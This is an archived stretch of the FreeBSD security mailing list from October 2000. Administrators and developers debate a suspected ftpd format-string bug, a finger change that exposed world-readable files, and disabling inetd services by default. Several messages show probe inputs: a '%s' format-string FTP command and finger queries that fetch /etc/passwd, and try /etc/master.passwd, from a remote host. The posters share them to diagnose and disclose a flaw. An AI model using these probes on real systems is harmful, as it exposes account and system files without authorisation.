- Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 16: 7:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from marius.org (marius.org [216.88.115.170]) by hub.freebsd.org (Postfix) with ESMTP id 55D5B37B503 for ; Mon, 2 Oct 2000 16:07:33 -0700 (PDT) Received: (from marius@localhost) by marius.org (8.11.0/8.11.0) id e92N71O26048; Mon, 2 Oct 2000 18:07:01 -0500 (CDT) Date: Mon, 2 Oct 2000 18:07:00 -0500 From: Marius Strom To: Jordan Hubbard Cc: Brett Glass , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 Message-ID: <20001002180700.D18840@marius.org> Mail-Followup-To: Jordan Hubbard , Brett Glass , security@FreeBSD.ORG References: <59846.970514080@winston.osd.bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <59846.970514080@winston.osd.bsdi.com>; from jkh@winston.osd.bsdi.com on Mon, Oct 02, 2000 at 12:14:40PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org And if you want more proof of this: telnet 21 Issue the commands from telnet, poof. On Mon, Oct 02, 2000 at 12:14:40PM -0700, Jordan Hubbard wrote: > > I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen > > I administer, and have been wondering why. Perhaps this message explains > > it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch > > up until at least 3.4-RELEASE (maybe later). > > That's the client crashing, you knob. Read the advisories more closely. > What linux ftp clients do is not all that urgent a concern of ours. > > - Jordan > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Marius Strom Professional Geek/Unix System Administrator Alpha1 Internet http://www.marius.org/marius.pgp 0x55DE53E4 Turn off the faucet? 
We're too busy mopping up the floor! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 16:12:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id EF98C37B502 for ; Mon, 2 Oct 2000 16:12:23 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e92NCLI04970; Mon, 2 Oct 2000 17:12:22 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id RAA15658; Mon, 2 Oct 2000 17:12:21 -0600 (MDT) Message-Id: <200010022312.RAA15658@harmony.village.org> To: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: Alex Charalabidis , "Chris D . Faulhaber" , security@FreeBSD.ORG In-reply-to: Your message of "Mon, 02 Oct 2000 13:28:39 MDT." <4.3.2.7.2.20001002125825.00de8f00@localhost> References: <4.3.2.7.2.20001002125825.00de8f00@localhost> <4.3.2.7.2.20001002123113.049344d0@localhost> Date: Mon, 02 Oct 2000 17:12:21 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.2.7.2.20001002125825.00de8f00@localhost> Brett Glass writes: : I am now using the MS-DOS 7 client and connecting to a FreeBSD 4.1+ server : (running FreeBSD 4.1-20000916-STABLE). Here's what I see from the client side: : : ftp> quote %s%s%s%s%s : 500 '+H|X++_YX++|¶QUOTE %s%s%s%s%s(null)%s%s%s%s%s': command not understood. I can't recreate this here with my stock 4.1 server from the stock 4.1 client. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 16:28:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 0172F37B503 for ; Mon, 2 Oct 2000 16:28:31 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e92NSSI05042; Mon, 2 Oct 2000 17:28:29 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id RAA15759; Mon, 2 Oct 2000 17:28:28 -0600 (MDT) Message-Id: <200010022328.RAA15759@harmony.village.org> To: Brett Glass Subject: Re: FTP problems: Clients? Servers? Both? Cc: Neil Blakey-Milner , Jordan Hubbard , security@FreeBSD.ORG In-reply-to: Your message of "Mon, 02 Oct 2000 14:29:25 MDT." <4.3.2.7.2.20001002140904.00df5390@localhost> References: <4.3.2.7.2.20001002140904.00df5390@localhost> <4.3.2.7.2.20001002133527.00d604a0@localhost> <4.3.2.7.2.20001002113441.04932240@localhost> <59846.970514080@winston.osd.bsdi.com> <4.3.2.7.2.20001002133527.00d604a0@localhost> Date: Mon, 02 Oct 2000 17:28:28 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.2.7.2.20001002140904.00df5390@localhost> Brett Glass writes: : Based on that modus operandi, I am beginning to think that the problems are : mostly in clients. I tested this with a 4.1.1 client against {3.2,3.3,3.4,3.5.1,4.1,4.1 stable as of July 7th, 4.1.1} and found that none of the servers were crashing at all, nor were they returning garbage. My 3.5.1 and 4.1.1 clients didn't crash when tested against a 4.1.1 server. I mean no disrespect, but I think this is a big non-issue. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 16:31:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id F189D37B66C; Mon, 2 Oct 2000 16:31:44 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e92NVhI05068; Mon, 2 Oct 2000 17:31:43 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id RAA15790; Mon, 2 Oct 2000 17:31:42 -0600 (MDT) Message-Id: <200010022331.RAA15790@harmony.village.org> To: Robert Watson Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: Nate Williams , Poul-Henning Kamp , James Wyatt , Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG, asmodai@FreeBSD.ORG In-reply-to: Your message of "Mon, 02 Oct 2000 17:10:49 EDT." References: Date: Mon, 02 Oct 2000 17:31:42 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Robert Watson writes: : I think it is too early to write off 3-STABLE as there is a huge install : base for the branch, and many products based on it. We don't even have a : native Netscape build for 4-STABLE yet :-). I think it is fine to assert : that no new feature development is occuring there, however. According to the security officer's long standing policy, we don't commit to support the old stale branch after we've had two releases on the new stable branch. This doesn't mean that we prevent people from contributing to it, just that we don't have resources to do so. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 16:43:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 96AE537B503; Mon, 2 Oct 2000 16:43:23 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id RAA11320; Mon, 2 Oct 2000 17:43:17 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002173916.046c16f0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 17:43:10 -0600 To: Kris Kennaway From: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: Alex Charalabidis , "Chris D . Faulhaber" , security@FreeBSD.org In-Reply-To: <20001002143917.B22329@freefall.freebsd.org> References: <4.3.2.7.2.20001002125825.00de8f00@localhost> <4.3.2.7.2.20001002123113.049344d0@localhost> <4.3.2.7.2.20001002125825.00de8f00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 03:39 PM 10/2/2000, Kris Kennaway wrote: >No, I think your client is expanding the %s locally and sending the >junk to the server. Kris: I think you may be right here! The client may also be expanding the %s on the way BACK from the server. If this is the case, it is more serious because it means that a malicious server might be able to take over the client. I am checking to see if there are holes in the server, too. So far, when I send the same strings to the server using good ol' Telnet the server seems to respond pretty much correctly. 
There are still some minor server glitches: Some error messages are sent twice instead of once, the command is always changed to all uppercase up to the first whitespace and then echoed back with this modification, and trailing whitespace at the ends of commands is not ignored. But while these things could use fixing, none of them are exploitable. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 17: 1: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (placeholder-dcat-1076843290.broadbandoffice.net [64.47.83.26]) by hub.freebsd.org (Postfix) with ESMTP id 6E78237B502 for ; Mon, 2 Oct 2000 17:01:06 -0700 (PDT) Received: (from dillon@localhost) by earth.backplane.com (8.11.0/8.9.3) id e9300o311655; Mon, 2 Oct 2000 17:00:50 -0700 (PDT) (envelope-from dillon) Date: Mon, 2 Oct 2000 17:00:50 -0700 (PDT) From: Matt Dillon Message-Id: <200010030000.e9300o311655@earth.backplane.com> To: Garance A Drosihn Cc: freebsd-security@FreeBSD.ORG Subject: Re: Proposed minor mod to openssh for interactive operation References: <200009300023.e8U0NUW20137@earth.backplane.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> two programs interactively. :> That is, send command, wait response, send command, wait :> response. Delaying packets is a bad idea and cuts :> performance over the link by about 20%. : :Would it be more appropriate to use stunnel (in ports) instead :of an ssh connection for your application? : :(I'm just wondering...) :--- :Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu No, ssh provides the authentication mechanism as well as the secure link trivially. Besides, both rsh and ssh were designed for two-way operation so presumably they should actually do it in a reasonably optimal manner when two-way operation is requested. 
-Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 17:21:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 3774C37B66C; Mon, 2 Oct 2000 17:21:34 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e930LY006073; Mon, 2 Oct 2000 17:21:34 -0700 (PDT) Date: Mon, 2 Oct 2000 17:21:33 -0700 From: Alfred Perlstein To: "Jordan K. Hubbard" Cc: security@FreeBSD.org Subject: Re: cvs commit: src/etc inetd.conf Message-ID: <20001002172133.B27736@fw.wintelcom.net> References: <200010030008.RAA18074@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <200010030008.RAA18074@freefall.freebsd.org>; from jkh@FreeBSD.org on Mon, Oct 02, 2000 at 05:08:16PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Jordan K. Hubbard [001002 17:08] wrote: > jkh 2000/10/02 17:08:16 PDT > > Modified files: > etc inetd.conf > Log: > Turn fingerd OFF by default. Comparative essentials like telnetd > are bad enough, but finger is hardly a critical system service and > it's traditionally been vulnerable to a variety of attacks; anybody > remember RTFM and his worm? Can we please loose everything but telnet and ftp? This getting silly, your average user nowadays is less likely to know what rsh, rlogin, comsat and ntalk are then to have an actual need for them. And yes I also just had a mad scramble because I could have sworn that finger was off by default, luckily it seems that I'd either killed inetd or commented it out on all my hosts already. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 17:26:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id B96F237B502 for ; Mon, 2 Oct 2000 17:26:57 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e930QOK06251; Mon, 2 Oct 2000 17:26:24 -0700 (PDT) Date: Mon, 2 Oct 2000 17:26:24 -0700 From: Alfred Perlstein To: Jordan Hubbard Cc: Warner Losh , Brian Somers , security@freebsd.org Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001002172624.C27736@fw.wintelcom.net> References: <78462.970531991@winston.osd.bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <78462.970531991@winston.osd.bsdi.com>; from jkh@winston.osd.bsdi.com on Mon, Oct 02, 2000 at 05:13:11PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Jordan Hubbard [001002 17:16] wrote: > > It is?!? Holy crap it IS - when did THAT happen? Somebody was > > And just to follow up to myself, I see by the logs that it's been on > for a very long time if not the very beginning. As I just said on > security, I guess I've been turning it off practically in my sleep > since it's not enabled on any of my systems and I don't even remember > disabling it. Since fingerd is hardly an essential service, I'm > hoping that few will argue with my recent decision to comment it out > by default. It's not like people will suddenly lose access to newly > installed systems (from Windows or some other no-ssh-by-default > environment), as was argued to be the case with telnetd. I've also found rather painfully that your smarter script kiddies will gleefully use your finger info to figure out where your DSL line is and happily smurf you to death. 
Or sometimes they'll just use it to fire up talk to you on your home machine which is good for a near heart attack. So can we turn this junk off? There should be no reason for a "securing FreeBSD" article to be posted somewhere. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 17:28:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id A213F37B502 for ; Mon, 2 Oct 2000 17:28:13 -0700 (PDT) Received: from bsdie.rwsystems.net([209.197.223.2]) (1158 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 2 Oct 2000 19:13:17 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Mon, 2 Oct 2000 19:13:16 -0500 (CDT) From: James Wyatt To: Jordan Hubbard Cc: Poul-Henning Kamp , Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <72365.970526437@winston.osd.bsdi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Oct 2000, Jordan Hubbard wrote: > > Then why is Walnut Creek CDROM still selling it as a current product? > > Because Walnut Creek CDROM (aka BSDI) still supports it. We don't > expect the project to do that for free, of course. Ah, Thank you for the distinction. I'm not sure I agree, but who cares about that? I'll be getting the new ROMs soon, but I can hope until then. 
From owner-freebsd-security Mon Oct 2 17:28:31 2000
Delivered-To: freebsd-security@freebsd.org
Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id 6E6A937B503 for ; Mon, 2 Oct 2000 17:28:28 -0700 (PDT)
Received: (qmail 64153 invoked by uid 1000); 3 Oct 2000 00:28:27 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 3 Oct 2000 00:28:27 -0000
Date: Mon, 2 Oct 2000 20:28:25 -0400 (EDT)
From: Matt Heckaman
X-Sender: matt@epsilon.lucida.qc.ca
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
In-Reply-To: <4.3.2.7.2.20001002124607.00df8150@localhost>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Spam-Rating: localhost 1.6.2 0/1000/N
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Mon, 2 Oct 2000, Brett Glass wrote:

: People are still running it 3.x, though. LOTS of people.

Yep, not everyone can afford the downtime involved upgrading to 4.x. I know I still have a 3.5-STABLE machine for exactly that reason. I suppose one day I'll piss everyone off for a day and upgrade it, but until then... 3.{4,5} should NOT be dead, it has not been that long.

: --Brett

* Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ *
* GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 *

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.3 (FreeBSD)
Comment: http://www.lucida.qc.ca/pgp

iD8DBQE52SgrdMMtMcA1U5ARAsd5AKDVeeliOidgFYrTsHUJWKWIrAUPTACgxz9E
0BO7q0vyS+vncM+xtS8CCIk=
=PXez
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Oct 2 17:40:32 2000
Delivered-To: freebsd-security@freebsd.org
Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id A44E237B66C; Mon, 2 Oct 2000 17:40:23 -0700 (PDT)
Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e930dTU78693; Mon, 2 Oct 2000 17:39:35 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com)
To: Alfred Perlstein
Cc: "Jordan K. Hubbard" , security@FreeBSD.org
Subject: Re: cvs commit: src/etc inetd.conf
In-Reply-To: Message from Alfred Perlstein of "Mon, 02 Oct 2000 17:21:33 PDT." <20001002172133.B27736@fw.wintelcom.net>
Date: Mon, 02 Oct 2000 17:39:27 -0700
Message-ID: <78689.970533567@winston.osd.bsdi.com>
From: Jordan Hubbard
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Can we please lose everything but telnet and ftp? This getting

That wouldn't bother me at all. I'd even say lose ftp, but sysinstall asks about it right now and we'd have to disable that functionality or teach sysinstall about grubbing in inetd.conf files before it would be a truly practical suggestion.
- Jordan

From owner-freebsd-security Mon Oct 2 17:58:40 2000
Delivered-To: freebsd-security@freebsd.org
Received: from pebkac.owp.csus.edu (pebkac.owp.csus.edu [130.86.232.245]) by hub.freebsd.org (Postfix) with ESMTP id 3B12237B503; Mon, 2 Oct 2000 17:58:33 -0700 (PDT)
Received: from owp.csus.edu (qbqjyl@[130.86.77.19]) by pebkac.owp.csus.edu (8.9.3/8.9.3) with ESMTP id RAA60378; Mon, 2 Oct 2000 17:58:33 -0700 (PDT) (envelope-from joseph.scott@owp.csus.edu)
Message-ID: <39D92E08.E00CF2E4@owp.csus.edu>
Date: Mon, 02 Oct 2000 17:53:28 -0700
From: Joseph Scott
X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: Brian Somers
Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: cvs commit: src/usr.bin/finger finger.c
References: <200010022227.PAA62603@freefall.freebsd.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Brian Somers wrote:
>
> brian 2000/10/02 15:27:34 PDT
>
> Modified files:
> usr.bin/finger finger.c
> Log:
> Don't allow finger /somefile, only allow filename expansions from
> inside /etc/finger.conf

This is one of those things that makes me go ack! So I started trying on a couple of my machines here. I tried it first against my own notebook running 4.1. It worked just as expected when run up against /etc/passwd@localhost. It did not work against a 3.4 machine from notebook though. I haven't looked too much closer at that part, but it seems to point to this "feature" being added somewhere between Jan 27 and Sep 14 (about the last world builds for these two machines).

Another thing I've noticed, it looks like it only works against world readable files. So some couldn't do a finger /etc/master.passwd@goodguysrus.com and expect something back. There are of course plenty of world readable files on a system that I wouldn't really want everyone and their fish to look at :-(

I'm not a fan of finger in general, turning off inetd entirely is part of a normal install for me.

--
Joseph Scott
joseph.scott@owp.csus.edu
The Office Of Water Programs - CSU Sacramento

From owner-freebsd-security Mon Oct 2 18: 0: 8 2000
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 1EB6437B671 for ; Mon, 2 Oct 2000 17:59:56 -0700 (PDT)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id SAA11939; Mon, 2 Oct 2000 18:59:12 -0600 (MDT)
Message-Id: <4.3.2.7.2.20001002185439.044cff00@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Mon, 02 Oct 2000 18:59:08 -0600
To: Jordan Hubbard , Alfred Perlstein
From: Brett Glass
Subject: Re: cvs commit: src/etc inetd.conf
Cc: security@FreeBSD.ORG
In-Reply-To: <78689.970533567@winston.osd.bsdi.com>
References: <20001002172133.B27736@fw.wintelcom.net>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

My personal preference would be to lose telnet and ftp too (or at least offer this as an option) and enable sshd (which gives you ssh and scp instead). Since I realise that not everyone would want this, there should be an alternative inetd.conf that's more insecure by default. (The user should be warned that he's enabling protocols with plaintext passwords.)

I just reviewed the three options in 4.1.1, and I think that they are a good start. However, there's not enough information about what they do! It'd be nice to see more detail (perhaps by hitting F1 for help).
As for munging inetd.conf: It'd be nice, but offering several alternative files and switching between them would be fine. So would doing a "cat" of hunks of the file to assemble it; minimal intelligence is needed for this.

--Brett

At 06:39 PM 10/2/2000, Jordan Hubbard wrote:
>> Can we please lose everything but telnet and ftp? This getting
>
>That wouldn't bother me at all. I'd even say lose ftp, but sysinstall
>asks about it right now and we'd have to disable that functionality or
>teach sysinstall about grubbing in inetd.conf files before it would be
>a truly practical suggestion.
>
>- Jordan

From owner-freebsd-security Mon Oct 2 18: 1:14 2000
Delivered-To: freebsd-security@freebsd.org
Received: from delivery.insweb.com (delivery.insweb.com [12.16.212.64]) by hub.freebsd.org (Postfix) with ESMTP id AD6CB37B503 for ; Mon, 2 Oct 2000 18:01:12 -0700 (PDT)
Received: from ursine.com (dhcp4-202.secure.insweb.com [192.168.4.202]) by delivery.insweb.com (8.9.2/8.9.3) with ESMTP id SAA34221 for ; Mon, 2 Oct 2000 18:01:07 -0700 (PDT) (envelope-from fbsd-security@ursine.com)
Message-ID: <39D93044.8B0C4E69@ursine.com>
Date: Mon, 02 Oct 2000 18:03:00 -0700
From: Michael Bryan
X-Mailer: Mozilla 4.75 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: security@FreeBSD.ORG
Subject: Re: cvs commit: src/etc inetd.conf
References: <200010030008.RAA18074@freefall.freebsd.org> <20001002172133.B27736@fw.wintelcom.net>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Alfred Perlstein wrote:
>
> And yes I also just had a mad scramble because I could have sworn that
> finger was off by default, luckily it seems that I'd either killed
> inetd or commented it out on all my hosts already.

A command that I -always- execute on any freshly installed system, and from time to time when checking up on things:

netstat -an

If any port has a listener on it, as an admin you'd better know what that listener is and why it's needed, and make any setup changes as warranted. It really helps a lot when setting up a box to make sure I've really disabled all the services I intended to. (Usually everything off except ssh and maybe SMTP and/or DNS, depending on the purpose of the box.)

From owner-freebsd-security Mon Oct 2 18: 1:43 2000
Delivered-To: freebsd-security@freebsd.org
Received: from pebkac.owp.csus.edu (pebkac.owp.csus.edu [130.86.232.245]) by hub.freebsd.org (Postfix) with ESMTP id 3CE6637B503; Mon, 2 Oct 2000 18:01:39 -0700 (PDT)
Received: from owp.csus.edu (idqfmh@[130.86.77.19]) by pebkac.owp.csus.edu (8.9.3/8.9.3) with ESMTP id SAA60430; Mon, 2 Oct 2000 18:01:11 -0700 (PDT) (envelope-from joseph.scott@owp.csus.edu)
Message-ID: <39D92EA6.4F75881A@owp.csus.edu>
Date: Mon, 02 Oct 2000 17:56:06 -0700
From: Joseph Scott
X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: Jordan Hubbard
Cc: Alfred Perlstein , "Jordan K. Hubbard" , security@FreeBSD.ORG
Subject: Re: cvs commit: src/etc inetd.conf
References: <78689.970533567@winston.osd.bsdi.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Jordan Hubbard wrote:
>
> > Can we please lose everything but telnet and ftp? This getting
>
> That wouldn't bother me at all. I'd even say lose ftp, but sysinstall
> asks about it right now and we'd have to disable that functionality or
> teach sysinstall about grubbing in inetd.conf files before it would be
> a truly practical suggestion.
Another possible solution would be to remove the ftp line out of inetd entirely and run it as a stand alone daemon. This would allow us to add the needed glue to /etc/defaults/rc.conf and /etc/rc.conf. Based on observations of sysinstall this wouldn't be too different from what we do with things like gateway_enable and the like.

--
Joseph Scott
joseph.scott@owp.csus.edu
The Office Of Water Programs - CSU Sacramento

From owner-freebsd-security Mon Oct 2 18: 3:11 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 915F837B502; Mon, 2 Oct 2000 18:03:03 -0700 (PDT)
Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA46224; Mon, 2 Oct 2000 18:03:03 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Date: Mon, 2 Oct 2000 18:03:03 -0700
From: Kris Kennaway
To: Joseph Scott
Cc: Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: cvs commit: src/usr.bin/finger finger.c
Message-ID: <20001002180303.A40584@freefall.freebsd.org>
References: <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <39D92E08.E00CF2E4@owp.csus.edu>; from joseph.scott@owp.csus.edu on Mon, Oct 02, 2000 at 05:53:28PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Oct 02, 2000 at 05:53:28PM -0700, Joseph Scott wrote:
> but it seems to point to this "feature" being added somewhere between
> Jan 27 and Sep 14 (about the last world builds for these two
> machines).

It was added just before 4.1.1, and since finger runs as user nobody it only allows reading those files. The annoying thing is that I still have this commit flagged in my cvs folder because it seemed potentially dangerous, but I never got to looking at it and I didn't notice it had been MFCed. Oh well, too late now - at least it was caught in relatively short order :-)

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Mon Oct 2 18:47:34 2000
Delivered-To: freebsd-security@freebsd.org
Received: from roble.com (roble.com [206.40.34.50]) by hub.freebsd.org (Postfix) with ESMTP id F09F437B502 for ; Mon, 2 Oct 2000 18:47:29 -0700 (PDT)
Received: from roble2.roble.com (roble2.roble.com [206.40.34.52]) by roble.com with SMTP id SAA18244 for ; Mon, 2 Oct 2000 18:47:33 -0700 (PDT)
Date: Mon, 2 Oct 2000 18:47:28 -0700 (PDT)
From: Roger Marquis
To: security@freebsd.org
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>OS revisions are a fact of life, but since 4v0 was just released in
>April and took some time to get to 4v1 (never trust %d.0 releases), I
>would have expected a bit more support. Sometimes CVS isn't the answer
>- like the 2v2r8 release firewall one of my cheaper clients has. We are
>going to put a 4v1r1 box in place of it, but usually replacement is a
>pain. - Jy@

OS upgrades are far more difficult than patches, both in terms of downtime and in terms of backwards compatibility. Operating Systems like FreeBSD, lacking much in the way of backwards compatibility, must be babied through frequent upgrades with lots of skilled systems administration. This runs contrary to systems administration principle #2: work smarter not harder.
